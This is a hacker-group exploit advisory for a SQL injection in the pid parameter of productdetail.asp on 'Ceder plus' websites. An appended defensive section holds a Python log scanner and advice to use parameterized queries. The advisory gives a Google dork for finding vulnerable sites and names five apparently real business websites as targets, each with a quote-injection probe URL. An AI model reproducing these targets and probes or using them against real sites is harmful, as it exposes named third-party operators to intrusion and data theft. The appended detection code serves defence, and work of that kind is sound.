Sites powered by Ceder suffer from a remote SQL injection vulnerability. Note that this advisory has site-specific information.
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
|-------------------------------------------------------------------------|
| [/] Exploit Title: Ceder plus Sql Injection Vulnerability
|
| [\] Exploit Author: Ashiyane Digital Security Team
|
| [/] Software Link : http://www.cedar-plus.com
|
| [\] Google Dork: intext:"Powered by ceder plus"
|
| [\] Tested on: Windows,Linux
|-------------------------------------------------------------------------|
| [/] Exploit: Sql Injection
| [/] Location : [Target]/productdetail.asp?pid=[Sql Injection]
|-------------------------------------------------------------------------|
| [/] Proof:
|
| [\] http://www.becxtrading.nl/productdetail.asp?pid='
|
| [/] http://bosstrading.info/productdetail.asp?pid='
|
| [\] http://bossmachinery.be/productdetail.asp?pid='
|
| [/] http://www.dasime.nl/productdetail.asp?pid='
|
| [\] http://www.wetsports.nl/productdetail.asp?pid='
|-------------------------------------------------------------------------|
| [/]Discovered By : ACC3SS
|-------------------------------------------------------------------------|
|-------------------------------------------------------------------------|
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
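
For operators of affected sites, the following added example (not part of the original advisory) scans web access-log lines for requests to productdetail.asp whose pid parameter is not a plain integer, which is how the quote probe shown under "Proof" appears in logs. The common-log-style line format, the assumption that legitimate pid values are decimal product ids, and the sample lines are all constructed for illustration.

```python
import re
from urllib.parse import parse_qs

# Assumption: legitimate pid values are short decimal product ids.
VALID_PID = re.compile(r"\d{1,10}")
# Request target inside a common/combined-format access-log line.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def suspicious_pid(line):
    """Return the decoded pid if the line requests productdetail.asp
    with a pid that is not a plain integer; otherwise return None."""
    m = REQUEST.search(line)
    if not m:
        return None
    path, _, query = m.group(1).partition("?")
    # Classic ASP paths and parameter names are case-insensitive.
    if not path.lower().endswith("/productdetail.asp"):
        return None
    # parse_qs percent-decodes values, so %27 is seen as a quote.
    params = {k.lower(): v
              for k, v in parse_qs(query, keep_blank_values=True).items()}
    for value in params.get("pid", []):
        if not VALID_PID.fullmatch(value):
            return value
    return None


def scan(lines):
    """Return (line_number, decoded_pid) for every suspicious request."""
    hits = []
    for n, line in enumerate(lines, 1):
        value = suspicious_pid(line)
        if value is not None:
            hits.append((n, value))
    return hits


# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /productdetail.asp?pid=42 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /productdetail.asp?pid=%27 HTTP/1.1" 500 1208',
    '198.51.100.7 - - [01/Jan/2024:10:00:06 +0000] "GET /ProductDetail.asp?PID=42%27 HTTP/1.1" 500 1208',
    '192.0.2.10 - - [01/Jan/2024:10:00:09 +0000] "GET /index.asp HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for n, value in scan(SAMPLE_LOG):
        print(f"line {n}: non-numeric pid {value!r}")
```

A hit paired with an HTTP 500 response suggests the value reached the database layer unvalidated; the durable fix is to validate pid as an integer and bind it through a parameterized query in productdetail.asp.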